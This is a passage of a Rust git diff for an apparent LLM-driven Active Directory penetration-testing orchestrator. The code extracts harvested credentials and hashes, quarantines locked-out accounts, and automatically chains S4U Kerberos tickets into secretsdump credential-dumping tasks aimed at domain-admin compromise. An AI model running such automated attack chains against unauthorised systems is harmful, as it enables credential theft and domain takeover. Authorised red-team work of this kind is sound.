hash.attack_step = step; + drop(state); + } + let _ = dispatcher.state.publish_hash(&dispatcher.queue, hash).await; + } + } + "vulnerability" | "delegation" => { + if let Ok(vuln) = serde_json::from_value::<VulnerabilityInfo>(data.clone()) { + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + } + } + "host" => match serde_json::from_value::<Host>(data.clone()) { + Ok(host) => { + let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; + } + Err(e) => { + warn!(err = %e, data = %data, "Failed to deserialize host discovery"); + } + }, + "share" => { + if let Ok(share) = serde_json::from_value::<Share>(data.clone()) { + let _ = dispatcher + .state + .publish_share(&dispatcher.queue, share) + .await; + } + } + "user" => { + if let Ok(user) = serde_json::from_value::<User>(data.clone()) { + if ["kerberos_enum", "netexec_user_enum"].contains(&user.source.as_str()) { + let _ = dispatcher.state.publish_user(&dispatcher.queue, user).await; + } + } + } + other => { + debug!(disc_type = other, "Unknown discovery type, ignoring"); + } + } + }
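+    // Wake any automation loops waiting on credential or delegation changes so
+    // the freshly published discoveries are acted on without another poll tick.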
dispatcher.credential_access_notify.notify_waiters(); + dispatcher.delegation_notify.notify_waiters(); + let _ = dispatcher.notify_state_update().await; + Ok(()) +} + +/// Check if a task result contains lockout error indicators. +pub(crate) fn has_lockout_in_result(result: &crate::orchestrator::task_queue::TaskResult) -> bool { + if let Some(ref err) = result.error { + if LOCKOUT_PATTERNS.iter().any(|p| err.contains(p)) { + return true; + } + } + if let Some(ref payload) = result.result { + if let Some(outputs) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for output in outputs { + if let Some(text) = output.as_str() { + if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { + return true; + } + } + } + } + for key in &["summary", "output", "tool_output"] { + if let Some(text) = payload.get(*key).and_then(|v| v.as_str()) { + if LOCKOUT_PATTERNS.iter().any(|p| text.contains(p)) { + return true; + } + } + } + } + false +} diff --git a/ares-cli/src/orchestrator/result_processing/mod.rs b/ares-cli/src/orchestrator/result_processing/mod.rs new file mode 100644 index 00000000..c8567695 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/mod.rs @@ -0,0 +1,611 @@ +//! Result processing and discovery polling. +//! +//! Handles completed task results: extracts discovered credentials, hashes, +//! hosts, and vulnerabilities from result payloads and publishes them to +//! shared state and Redis. +//! +//! Also polls the `ares:discoveries:{op_id}` LIST for real-time worker +//! discoveries that arrive outside the task result flow. + +pub mod admin_checks; +pub mod discovery_polling; +pub mod parsing; +#[cfg(test)] +mod tests; +pub mod timeline; + +// Re-exports consumed by callers outside this module +pub use discovery_polling::discovery_poller; + +use std::sync::Arc; + +use anyhow::Result; +use serde_json::Value; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::output_extraction; +use crate::orchestrator::results::CompletedTask; +use crate::orchestrator::throttling::Throttler; + +use self::admin_checks::{ + check_domain_admin_indicators, check_golden_ticket_completion, + detect_and_upgrade_admin_credentials, extract_and_cache_domain_sid, +}; +use self::discovery_polling::has_lockout_in_result; +use self::parsing::{parse_discoveries, resolve_parent_id}; +use self::timeline::{create_credential_timeline_event, create_hash_timeline_event}; + +/// Kerberos/SMB errors that indicate a credential is locked out. +pub(crate) const LOCKOUT_PATTERNS: &[&str] = + &["KDC_ERR_CLIENT_REVOKED", "STATUS_ACCOUNT_LOCKED_OUT"]; + +/// Process a completed task result: extract discoveries and update state. 
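+///
+/// Steps, in order (each best-effort): persist the completion to shared state,
+/// extract parser discoveries from the "discoveries" key, run regex extraction
+/// over raw tool output, cache any domain SID, chain S4U tickets into
+/// secretsdump, check golden-ticket/exploit completion, and quarantine
+/// credentials that triggered lockout errors.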
+pub async fn process_completed_task( + completed: &CompletedTask, + dispatcher: &Arc<Dispatcher>, + throttler: &Throttler, +) { + let task_id = &completed.task_id; + let result = &completed.result; + + let cred_key = { + let state = dispatcher.state.read().await; + state + .pending_tasks + .get(task_id.as_str()) + .and_then(|t| t.params.get("credential_key")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }; + + { + let core_result = ares_core::models::TaskResult { + task_id: task_id.clone(), + success: result.success, + result: result.result.clone(), + error: result.error.clone(), + completed_at: result.completed_at.unwrap_or_else(chrono::Utc::now), + }; + let _ = dispatcher + .state + .complete_task(&dispatcher.queue, task_id, core_result) + .await; + } + + if result.success { + info!( + task_id = %task_id, + agent = result.agent_name.as_deref().unwrap_or("unknown"), + "Task completed successfully" + ); + throttler.clear_rate_limit_error().await; + } else { + let err_msg = result.error.as_deref().unwrap_or("unknown error"); + warn!(task_id = %task_id, err = err_msg, "Task failed"); + + if err_msg.to_lowercase().contains("rate limit") || err_msg.to_lowercase().contains("429") { + throttler.record_rate_limit_error().await; + } + // Don't return early — failed tasks (MaxSteps, Error) may still carry + // parser-extracted discoveries from tool calls that ran before failure. + // All discoveries now come from regex parsers, not LLM hallucination. + } + + // Extract discoveries ONLY from the "discoveries" key — populated exclusively + // by ares-tools parsers in submission.rs. The top-level payload is LLM-generated + // and must never be fed into parse_discoveries() (hallucination risk). + if let Some(ref payload) = result.result { + if let Some(disc) = payload.get("discoveries") { + if let Err(e) = extract_discoveries(disc, dispatcher).await { + warn!(task_id = %task_id, err = %e, "Failed to extract parser discoveries"); + } + check_domain_admin_indicators(disc, dispatcher).await; + } + } + + // Secondary pass: regex-based extraction from raw text in the result. + // This catches discoveries that the per-tool parsers or LLM may have missed. + if let Some(ref payload) = result.result { + let default_domain = get_default_domain(dispatcher).await; + extract_from_raw_text(payload, dispatcher, &default_domain).await; + } + + // Domain SID extraction: scan raw text for S-1-5-21-... patterns (from secretsdump). + // Caches the SID for golden ticket generation without needing lookupsid. + if let Some(ref payload) = result.result { + extract_and_cache_domain_sid(payload, dispatcher).await; + } + + // S4U auto-chain: detect .ccache in output and dispatch secretsdump with ticket. + // Mirrors Python's _auto_chain_s4u_lateral_movement — when a task produces a + // Kerberos ticket (.ccache), chain a secretsdump using that ticket for + // immediate credential extraction.
+ if let Some(ref payload) = result.result { + auto_chain_s4u_secretsdump(payload, dispatcher, &completed.task_id).await; + } + + if result.success { + if let Some(ref payload) = result.result { + check_golden_ticket_completion(payload, &completed.task_id, dispatcher).await; + } + } + + if result.success { + if let Some(vuln_id) = completed + .task_id + .starts_with("exploit_") + .then(|| { + result + .result + .as_ref() + .and_then(|r| r.get("vuln_id")) + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }) + .flatten() + { + info!(vuln_id = %vuln_id, task_id = %task_id, "Marking vulnerability as exploited"); + if let Err(e) = dispatcher + .state + .mark_exploited(&dispatcher.queue, &vuln_id) + .await + { + warn!(err = %e, vuln_id = %vuln_id, "Failed to mark vulnerability exploited"); + } + } + } + + if let Some(ref key) = cred_key { + if has_lockout_in_result(result) { + if let Some((username, domain)) = key.split_once('@') { + warn!( + credential = %key, + task_id = %task_id, + "Credential quarantined for 5 min: lockout detected" + ); + dispatcher + .state + .write() + .await + .quarantine_credential(username, domain); + } + } + } + + dispatcher.credential_access_notify.notify_waiters(); + dispatcher.delegation_notify.notify_waiters(); + + let _ = dispatcher.notify_state_update().await; +} + +/// Get the default domain from state (first domain, or empty string). +async fn get_default_domain(dispatcher: &Arc<Dispatcher>) -> String { + let state = dispatcher.state.read().await; + state.domains.first().cloned().unwrap_or_default() +} + +/// S4U auto-chain: detect .ccache ticket in task output and dispatch secretsdump. +/// +/// Mirrors Python's `_auto_chain_s4u_lateral_movement` — when a task produces a +/// Kerberos ticket file (.ccache), automatically dispatch a secretsdump task using +/// that ticket. This chains S4U/delegation → secretsdump without waiting for the +/// next automation cycle. +async fn auto_chain_s4u_secretsdump(payload: &Value, dispatcher: &Arc<Dispatcher>, task_id: &str) { + // Collect ONLY raw tool output fields — never LLM-generated summaries. + let mut text_parts: Vec<&str> = Vec::new(); + for key in &["tool_output", "output"] { + if let Some(s) = payload.get(*key).and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + text_parts.push(s); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + } + + let combined = text_parts.join("\n"); + let ticket_path = match ares_llm::routing::extract_ticket_path(&combined) { + Some(p) => p, + None => return, // No .ccache found + }; + + info!( + task_id = %task_id, + ticket_path = %ticket_path, + "Detected .ccache ticket — chaining secretsdump" + ); + + // Try to extract target from the task params (target_spn → host) or ccache filename + let target_ip = payload + .get("target_spn") + .and_then(|v| v.as_str()) + .and_then(ares_llm::routing::extract_host_from_spn) + .or_else(|| { + // Try to parse target from ccache filename: + // Administrator@cifs_dc01.contoso.local@CONTOSO.LOCAL.ccache + let fname = ticket_path.rsplit('/').next().unwrap_or(&ticket_path); + if let Some(at_pos) = fname.find('@') { + let after = &fname[at_pos + 1..]; + // Extract hostname: cifs_dc01.contoso.local@REALM.ccache + let host_part = after.split('@').next().unwrap_or(after).replace('_', "."); + // Remove the service prefix (cifs.
→ dc01.contoso.local) + if let Some(dot_pos) = host_part.find('.') { + let candidate = &host_part[dot_pos + 1..]; + if candidate.contains('.') { + return Some(candidate.to_string()); + } + } + } + None + }) + .or_else(|| { + // Fallback: use target_ip from the task payload + payload + .get("target_ip") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }) + .or_else(|| { + payload + .get("target") + .and_then(|v| v.as_str()) + .map(|s| s.to_string()) + }); + + let target_ip = match target_ip { + Some(ip) => ip, + None => { + warn!(task_id = %task_id, "S4U auto-chain: .ccache found but no target could be determined"); + return; + } + }; + + // Resolve target IP if it's a hostname + let resolved_ip = { + let state = dispatcher.state.read().await; + // Check if target_ip is actually an IP already + if target_ip.parse::<std::net::IpAddr>().is_ok() { + target_ip.clone() + } else { + // It's a hostname — look up in hosts + state + .hosts + .iter() + .find(|h| h.hostname.to_lowercase() == target_ip.to_lowercase()) + .map(|h| h.ip.clone()) + .unwrap_or(target_ip.clone()) + } + }; + + let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + + // Dispatch secretsdump with ticket (no password needed). + // Must include username — secretsdump requires it even with -k -no-pass. + // The S4U impersonates Administrator, so use that as default. + let username = payload + .get("impersonate") + .and_then(|v| v.as_str()) + .unwrap_or("Administrator"); + let sd_payload = serde_json::json!({ + "technique": "secretsdump", + "techniques": ["secretsdump"], + "target_ip": resolved_ip, + "username": username, + "domain": domain, + "ticket_path": ticket_path, + "no_pass": true, + }); + + match dispatcher + .throttled_submit("credential_access", "credential_access", sd_payload, 2) + .await + { + Ok(Some(new_task_id)) => { + info!( + parent_task = %task_id, + chained_task = %new_task_id, + target = %resolved_ip, + ticket = %ticket_path, + "S4U auto-chain: secretsdump dispatched with ticket" + ); + } + Ok(None) => {} + Err(e) => warn!(err = %e, "S4U auto-chain: failed to dispatch secretsdump"), + } +} + +/// Extract discoveries from raw text fields in the result payload. +/// +/// Collects text from the raw "tool_outputs" entries and runs regex-based +/// extraction over each one independently. This mirrors Python's +/// `_process_output_text()` — a safety net that catches discoveries the per-tool +/// parsers or LLM-reported structured data may have missed. +async fn extract_from_raw_text( + payload: &Value, + dispatcher: &Arc<Dispatcher>, + default_domain: &str, +) { + // Only parse tool_outputs — actual tool stdout collected by the agent loop. + // The result payload's "summary", "result", and "output" fields are all + // LLM-generated prose and MUST NOT be fed into regex extractors (they produce + // false positives like "Password : only" from conversational text). + // + // Structured discoveries from tool-call parsers are already handled by + // extract_discoveries() via the "discoveries" key — this pass is a secondary + // safety net for raw tool stdout that parsers may have missed.
+ let mut text_parts: Vec<&str> = Vec::new(); + + if let Some(arr) = payload.get("tool_outputs").and_then(|v| v.as_array()) { + for item in arr { + if let Some(s) = item.as_str() { + text_parts.push(s); + } else if let Some(s) = item.get("output").and_then(|v| v.as_str()) { + text_parts.push(s); + } + } + } + + if text_parts.is_empty() { + return; + } + + // Process each tool output independently to prevent stateful parsers + // (e.g. extract_plaintext_passwords's current_user tracker) from leaking + // context across unrelated tool calls — a joined string caused false + // credential attribution (e.g. john.smith:Summer2025 from stale context). + let mut extracted = output_extraction::TextExtractions::default(); + for part in &text_parts { + let partial = output_extraction::extract_from_output_text(part, default_domain); + extracted.credentials.extend(partial.credentials); + extracted.hashes.extend(partial.hashes); + extracted.hosts.extend(partial.hosts); + extracted.users.extend(partial.users); + extracted.shares.extend(partial.shares); + } + + if extracted.is_empty() { + return; + } + + let mut new_count = 0usize; + + for cred in extracted.credentials { + let is_cracked = cred.source.starts_with("cracked:"); + let cracked_username = cred.username.clone(); + let cracked_domain = cred.domain.clone(); + let cracked_password = cred.password.clone(); + match dispatcher + .state + .publish_credential(&dispatcher.queue, cred) + .await + { + Ok(true) => { + new_count += 1; + // When a cracked credential is published, update the corresponding + // hash's cracked_password field in state and Redis. + if is_cracked { + let _ = dispatcher + .state + .update_hash_cracked_password( + &dispatcher.queue, + &cracked_username, + &cracked_domain, + &cracked_password, + ) + .await; + } + } + Ok(false) => {} // duplicate + Err(e) => warn!(err = %e, "Failed to publish text-extracted credential"), + } + } + + for hash in extracted.hashes { + match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { + Ok(true) => new_count += 1, + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish text-extracted hash"), + } + } + + for host in extracted.hosts { + let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; + } + + // Users intentionally NOT published from raw text extraction. + // The DOMAIN\user regex matches every wordlist entry in kerbrute/ASREProast + // output (e.g. "[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set"). + // Only per-tool parsers (kerberos_enum, netexec_user_enum) produce verified + // users gated by KDC response patterns. + + for share in extracted.shares { + match dispatcher + .state + .publish_share(&dispatcher.queue, share) + .await + { + Ok(true) => new_count += 1, + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish text-extracted share"), + } + } + + // Pwn3d! detection: scan raw text for admin indicators and upgrade credentials. + // netexec output like "[+] DOMAIN\user:password (Pwn3d!)" means the credential + // has local admin rights. Mark existing credentials as is_admin and trigger + // immediate high-priority secretsdump. + // Check each tool output independently (joining is safe here — Pwn3d! is a + // standalone marker with no stateful context to leak). 
+ for part in &text_parts { + if part.contains("Pwn3d!") { + detect_and_upgrade_admin_credentials(part, dispatcher).await; + } + } + + if new_count > 0 { + info!( + count = new_count, + "Published new discoveries from raw text extraction" + ); + } +} + +/// Extract credentials, hashes, hosts, vulns, and shares from a result payload. +async fn extract_discoveries(payload: &Value, dispatcher: &Arc<Dispatcher>) -> Result<()> { + let mut parsed = parse_discoveries(payload); + + // Resolve credential lineage (parent_id / attack_step) before publishing. + // Read lock is released before any publish calls (which take write locks). + { + let state = dispatcher.state.read().await; + for cred in &mut parsed.credentials { + if cred.parent_id.is_none() { + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &cred.source, + &cred.username, + &cred.domain, + None, + None, + ); + cred.parent_id = pid; + cred.attack_step = step; + } + } + for hash in &mut parsed.hashes { + if hash.parent_id.is_none() { + let (pid, step) = resolve_parent_id( + &state.credentials, + &state.hashes, + &hash.source, + &hash.username, + &hash.domain, + None, + None, + ); + hash.parent_id = pid; + hash.attack_step = step; + } + } + } + + for cred in parsed.credentials { + // Capture fields before move for timeline event + let source = cred.source.clone(); + let username = cred.username.clone(); + let domain = cred.domain.clone(); + let password = cred.password.clone(); + let is_admin = cred.is_admin; + let is_cracked = source.starts_with("cracked"); + match dispatcher + .state + .publish_credential(&dispatcher.queue, cred) + .await + { + Ok(true) => { + debug!("Published new credential from result"); + create_credential_timeline_event(dispatcher, &source, &username, &domain, is_admin) + .await; + // When a cracked credential is published, update the corresponding + // hash's cracked_password field in state and Redis.
+ if is_cracked { + let _ = dispatcher + .state + .update_hash_cracked_password( + &dispatcher.queue, + &username, + &domain, + &password, + ) + .await; + } + } + Ok(false) => {} // duplicate + Err(e) => warn!(err = %e, "Failed to publish credential"), + } + } + + for hash in parsed.hashes { + // Capture fields before move for timeline event + let username = hash.username.clone(); + let domain = hash.domain.clone(); + let hash_type = hash.hash_type.clone(); + let hash_value = hash.hash_value.clone(); + let source = hash.source.clone(); + match dispatcher.state.publish_hash(&dispatcher.queue, hash).await { + Ok(true) => { + debug!("Published new hash from result"); + create_hash_timeline_event( + dispatcher, + &username, + &domain, + &hash_type, + &hash_value, + &source, + ) + .await; + } + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish hash"), + } + } + + for host in parsed.hosts { + let _ = dispatcher.state.publish_host(&dispatcher.queue, host).await; + } + + for user in parsed.users { + match dispatcher.state.publish_user(&dispatcher.queue, user).await { + Ok(true) => debug!("Published new user from result"), + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish user"), + } + } + + for vuln in parsed.vulnerabilities { + let _ = dispatcher + .state + .publish_vulnerability(&dispatcher.queue, vuln) + .await; + } + + for share in parsed.shares { + match dispatcher + .state + .publish_share(&dispatcher.queue, share) + .await + { + Ok(true) => debug!("Published new share from result"), + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish share"), + } + } + + // Extract trusted_domains from parser output + if let Some(trusts) = payload.get("trusted_domains").and_then(|v| v.as_array()) { + for trust_val in trusts { + if let Ok(trust) = + serde_json::from_value::<ares_core::models::TrustInfo>(trust_val.clone()) + { + match dispatcher + .state + .publish_trust_info(&dispatcher.queue, trust) + .await + { + Ok(true) => info!("Published new trust relationship from result"), + Ok(false) => {} + Err(e) => warn!(err = %e, "Failed to publish trust info"), + } + } + } + } + + Ok(()) +} diff --git a/ares-cli/src/orchestrator/result_processing/parsing.rs b/ares-cli/src/orchestrator/result_processing/parsing.rs new file mode 100644 index 00000000..dc850d64 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/parsing.rs @@ -0,0 +1,159 @@ +//! Pure parsing functions for result payloads -- no IO, no Redis. + +use serde_json::Value; + +use ares_core::models::{Credential, Hash, Host, Share, User, VulnerabilityInfo}; + +/// Parsed discoveries from a JSON result payload. +#[derive(Debug, Default)] +pub(crate) struct ParsedDiscoveries { + pub credentials: Vec<Credential>, + pub hashes: Vec<Hash>, + pub hosts: Vec<Host>, + pub users: Vec<User>, + pub vulnerabilities: Vec<VulnerabilityInfo>, + pub shares: Vec<Share>, +} + +/// Resolve the parent credential or hash for a newly discovered item.
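+///
+/// Rules, in order: a `cracked*` source links to the most recent matching hash;
+/// otherwise, when the task's input identity differs from the discovered one,
+/// link to that input credential or hash; anything else is a root `(None, 0)`.
+/// The returned step is always the parent's `attack_step + 1`.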
+pub(crate) fn resolve_parent_id( + credentials: &[Credential], + hashes: &[Hash], + source: &str, + username: &str, + domain: &str, + input_username: Option<&str>, + input_domain: Option<&str>, +) -> (Option<String>, i32) { + if source.starts_with("cracked") { + if let Some(h) = hashes.iter().rev().find(|h| { + h.username.eq_ignore_ascii_case(username) + && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) + }) { + return (Some(h.id.clone()), h.attack_step + 1); + } + } + if let Some(in_user) = input_username.filter(|u| !u.is_empty()) { + let in_domain = input_domain.unwrap_or(""); + let is_same = in_user.eq_ignore_ascii_case(username) + && (in_domain.eq_ignore_ascii_case(domain) + || in_domain.is_empty() + || domain.is_empty()); + if !is_same { + if let Some(c) = credentials.iter().rev().find(|c| { + c.username.eq_ignore_ascii_case(in_user) + && (in_domain.is_empty() + || c.domain.is_empty() + || c.domain.eq_ignore_ascii_case(in_domain)) + }) { + return (Some(c.id.clone()), c.attack_step + 1); + } + if let Some(h) = hashes.iter().rev().find(|h| { + h.username.eq_ignore_ascii_case(in_user) + && (in_domain.is_empty() + || h.domain.is_empty() + || h.domain.eq_ignore_ascii_case(in_domain)) + }) { + return (Some(h.id.clone()), h.attack_step + 1); + } + } + } + (None, 0) +} + +pub(crate) fn parse_discoveries(payload: &Value) -> ParsedDiscoveries { + let mut result = ParsedDiscoveries::default(); + + if let Some(creds) = payload.get("credentials").and_then(|v| v.as_array()) { + for cred_val in creds { + if let Ok(cred) = serde_json::from_value::<Credential>(cred_val.clone()) { + result.credentials.push(cred); + } + } + } + if let Some(cred_val) = payload.get("credential") { + if let Ok(cred) = serde_json::from_value::<Credential>(cred_val.clone()) { + result.credentials.push(cred); + } + } + if let Some(cracked) = payload.get("cracked_password").and_then(|v| v.as_str()) { + if let Some(username) = payload.get("username").and_then(|v| v.as_str()) { + let domain = payload.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + result.credentials.push(Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: cracked.to_string(), + domain: domain.to_string(), + source: "cracked".to_string(), + discovered_at: Some(chrono::Utc::now()), + is_admin: false, + parent_id: None, + attack_step: 0, + }); + } + } + if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { + for hash_val in hashes { + if let Ok(hash) = serde_json::from_value::<Hash>(hash_val.clone()) { + result.hashes.push(hash); + } + } + } + if let Some(hosts) = payload.get("hosts").and_then(|v| v.as_array()) { + for host_val in hosts { + if let Ok(host) = serde_json::from_value::<Host>(host_val.clone()) { + result.hosts.push(host); + } + } + } + // Users -- defense-in-depth: only accept entries with a parser-verified source.
+ const TRUSTED_USER_SOURCES: &[&str] = &["kerberos_enum", "netexec_user_enum"]; + if let Some(users) = payload.get("discovered_users").and_then(|v| v.as_array()) { + for user_val in users { + if let Ok(user) = serde_json::from_value::<User>(user_val.clone()) { + if TRUSTED_USER_SOURCES.contains(&user.source.as_str()) { + result.users.push(user); + } + } + } + } + if let Some(vulns) = payload.get("vulnerabilities").and_then(|v| v.as_array()) { + for vuln_val in vulns { + if let Ok(vuln) = serde_json::from_value::<VulnerabilityInfo>(vuln_val.clone()) { + result.vulnerabilities.push(vuln); + } + } + } + if result.vulnerabilities.is_empty() { + if let Some(vuln_val) = payload.get("vulnerability") { + if let Ok(vuln) = serde_json::from_value::<VulnerabilityInfo>(vuln_val.clone()) { + result.vulnerabilities.push(vuln); + } + } + } + if let Some(shares) = payload.get("shares").and_then(|v| v.as_array()) { + for share_val in shares { + if let Ok(share) = serde_json::from_value::<Share>(share_val.clone()) { + result.shares.push(share); + } + } + } + result +} + +/// Check if a payload contains domain admin indicators. Pure function. +pub(crate) fn has_domain_admin_indicator(payload: &Value) -> bool { + if payload.get("has_domain_admin").and_then(|v| v.as_bool()) == Some(true) { + return true; + } + if let Some(hashes) = payload.get("hashes").and_then(|v| v.as_array()) { + for hash_val in hashes { + if let Some(username) = hash_val.get("username").and_then(|v| v.as_str()) { + if username.to_lowercase() == "krbtgt" { + return true; + } + } + } + } + false +} diff --git a/ares-cli/src/orchestrator/result_processing/tests.rs b/ares-cli/src/orchestrator/result_processing/tests.rs new file mode 100644 index 00000000..69658a47 --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/tests.rs @@ -0,0 +1,211 @@ +use super::parsing::{has_domain_admin_indicator, parse_discoveries}; +use serde_json::json; + +#[test] +fn test_parse_credentials_array() { + let payload = json!({ + "credentials": [ + {"id": "c1", "username": "admin", "password": "P@ss1", + "domain": "contoso.local", "source": "kerberoast", "is_admin": false, "attack_step": 0}, + {"id": "c2", "username": "svc_sql", "password": "SqlPass1", + "domain": "contoso.local", "source": "secretsdump", "is_admin": false, "attack_step": 0} + ] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 2); + assert_eq!(parsed.credentials[0].username, "admin"); + assert_eq!(parsed.credentials[1].username, "svc_sql"); +} + +#[test] +fn test_parse_single_credential() { + let payload = json!({ + "credential": { + "id": "c1", "username": "admin", "password": "P@ss1", + "domain": "contoso.local", "source": "ntlm_relay", "is_admin": false, "attack_step": 0 + } + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert_eq!(parsed.credentials[0].source, "ntlm_relay"); +} + +#[test] +fn test_parse_cracked_password() { + let payload = + json!({"cracked_password": "Summer2024!", "username": "jdoe", "domain": "contoso.local"}); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert_eq!(parsed.credentials[0].username, "jdoe"); + assert_eq!(parsed.credentials[0].password, "Summer2024!"); + assert_eq!(parsed.credentials[0].source, "cracked"); +} + +#[test] +fn test_parse_cracked_password_without_username_ignored() { + let payload = json!({"cracked_password": "Summer2024!"}); + let parsed = parse_discoveries(&payload); + assert!(parsed.credentials.is_empty()); +} + +#[test] +fn test_parse_hashes() { + let
payload = json!({ + "hashes": [{"id": "h1", "username": "Administrator", "hash_value": "aad3b435:abcdef123456", + "hash_type": "NTLM", "domain": "contoso.local", "source": "secretsdump", + "is_cracked": false, "attack_step": 0}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.hashes.len(), 1); + assert_eq!(parsed.hashes[0].username, "Administrator"); + assert_eq!(parsed.hashes[0].hash_type, "NTLM"); +} + +#[test] +fn test_parse_hosts() { + let payload = json!({ + "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", + "os": "Windows Server 2019", "is_dc": true, "open_ports": [88, 389, 445]}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.hosts.len(), 1); + assert_eq!(parsed.hosts[0].ip, "192.168.58.10"); + assert!(parsed.hosts[0].is_dc); +} + +#[test] +fn test_parse_users_with_trusted_source() { + let payload = json!({ + "discovered_users": [{"username": "jdoe", "domain": "contoso.local", + "source": "kerberos_enum", "is_admin": false}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.users.len(), 1); + assert_eq!(parsed.users[0].username, "jdoe"); +} + +#[test] +fn test_parse_users_rejects_untrusted_source() { + let payload = json!({ + "discovered_users": [ + {"username": "fake_admin", "domain": "contoso.local", "is_admin": false}, + {"username": "also_fake", "domain": "contoso.local", + "source": "llm_hallucination", "is_admin": false} + ] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.users.len(), 0); +} + +#[test] +fn test_parse_vulnerabilities() { + let payload = json!({ + "vulnerabilities": [{"vuln_id": "vuln-001", "vuln_type": "constrained_delegation", + "target": "192.168.58.20", "discovered_by": "recon", + "details": {"account": "svc_sql"}, "recommended_agent": "privesc", + "priority": 3}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.vulnerabilities.len(), 1); + assert_eq!( + parsed.vulnerabilities[0].vuln_type, + "constrained_delegation" + ); +} + +#[test] +fn test_parse_shares() { + let payload = json!({ + "shares": [ + {"host": "192.168.58.10", "name": "SYSVOL", "permissions": "READ", "comment": "Logon server share"}, + {"host": "192.168.58.10", "name": "ADMIN$", "permissions": "READ,WRITE"} + ] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.shares.len(), 2); + assert_eq!(parsed.shares[0].name, "SYSVOL"); + assert_eq!(parsed.shares[1].name, "ADMIN$"); +} + +#[test] +fn test_parse_empty_payload() { + let payload = json!({}); + let parsed = parse_discoveries(&payload); + assert!(parsed.credentials.is_empty()); + assert!(parsed.hashes.is_empty()); + assert!(parsed.hosts.is_empty()); + assert!(parsed.users.is_empty()); + assert!(parsed.vulnerabilities.is_empty()); + assert!(parsed.shares.is_empty()); +} + +#[test] +fn test_parse_malformed_entries_skipped() { + let payload = json!({ + "credentials": [ + {"username": "valid", "id": "c1", "password": "x", "domain": "d", + "source": "s", "is_admin": false, "attack_step": 0}, + {"bad_field": "not a credential"} + ], + "hashes": [{"not_a_hash": true}] + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert!(parsed.hashes.is_empty()); +} + +#[test] +fn test_parse_mixed_payload() { + let payload = json!({ + "credentials": [{"id": "c1", "username": "admin", "password": "P@ss", + "domain": "contoso.local", "source": "test", "is_admin": true, "attack_step": 0}], + "hashes": [{"id": "h1", "username": "krbtgt", "hash_value": "abc123", "hash_type": 
"NTLM", + "domain": "contoso.local", "source": "secretsdump", "is_cracked": false, "attack_step": 0}], + "hosts": [{"ip": "192.168.58.10", "hostname": "dc01.contoso.local", "is_dc": true}], + "has_domain_admin": true, "domain_admin_path": "secretsdump -> Administrator" + }); + let parsed = parse_discoveries(&payload); + assert_eq!(parsed.credentials.len(), 1); + assert_eq!(parsed.hashes.len(), 1); + assert_eq!(parsed.hosts.len(), 1); +} + +#[test] +fn test_da_indicator_explicit_flag() { + assert!(has_domain_admin_indicator( + &json!({"has_domain_admin": true}) + )); +} + +#[test] +fn test_da_indicator_false_flag() { + assert!(!has_domain_admin_indicator( + &json!({"has_domain_admin": false}) + )); +} + +#[test] +fn test_da_indicator_krbtgt_hash() { + assert!(has_domain_admin_indicator( + &json!({"hashes": [{"username": "krbtgt", "hash_value": "abc"}]}) + )); +} + +#[test] +fn test_da_indicator_krbtgt_case_insensitive() { + assert!(has_domain_admin_indicator( + &json!({"hashes": [{"username": "KRBTGT", "hash_value": "abc"}]}) + )); +} + +#[test] +fn test_da_indicator_non_krbtgt_hash() { + assert!(!has_domain_admin_indicator( + &json!({"hashes": [{"username": "Administrator", "hash_value": "abc"}]}) + )); +} + +#[test] +fn test_da_indicator_empty_payload() { + assert!(!has_domain_admin_indicator(&json!({}))); +} diff --git a/ares-cli/src/orchestrator/result_processing/timeline.rs b/ares-cli/src/orchestrator/result_processing/timeline.rs new file mode 100644 index 00000000..a1b0f44e --- /dev/null +++ b/ares-cli/src/orchestrator/result_processing/timeline.rs @@ -0,0 +1,100 @@ +//! Timeline event helpers. + +use std::sync::Arc; + +use crate::orchestrator::dispatcher::Dispatcher; + +pub(crate) async fn create_credential_timeline_event( + dispatcher: &Arc, + source: &str, + username: &str, + domain: &str, + is_admin: bool, +) { + let mut techniques: Vec = vec![if is_admin { + "T1078".to_string() + } else { + "T1552".to_string() + }]; + let source_lower = source.to_lowercase(); + if source_lower.contains("kerberoast") { + techniques.push("T1558.003".to_string()); + } + 